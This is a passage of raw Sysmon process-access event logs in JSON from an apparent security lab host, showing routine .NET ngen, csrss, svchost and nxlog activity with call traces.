(x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7711,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.653\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001033240C00}\r\nTargetProcessId: 932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.653","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001033240C00}","TargetProcessId":"932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7712,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.653\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001033240C00}\r\nTargetProcessId: 932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.653","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001033240C00}","TargetProcessId":"932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7713,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.668\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001033240C00}\r\nTargetProcessId: 932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.668","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001033240C00}","TargetProcessId":"932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7714,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.934\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001033280C00}\r\nTargetProcessId: 1836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.934","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001033280C00}","TargetProcessId":"1836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7715,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.934\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001033280C00}\r\nTargetProcessId: 1836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.934","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001033280C00}","TargetProcessId":"1836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7716,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.950\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001033280C00}\r\nTargetProcessId: 1836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.950","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001033280C00}","TargetProcessId":"1836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7717,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.278\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010AA2C0C00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.278","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010AA2C0C00}","TargetProcessId":"4772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\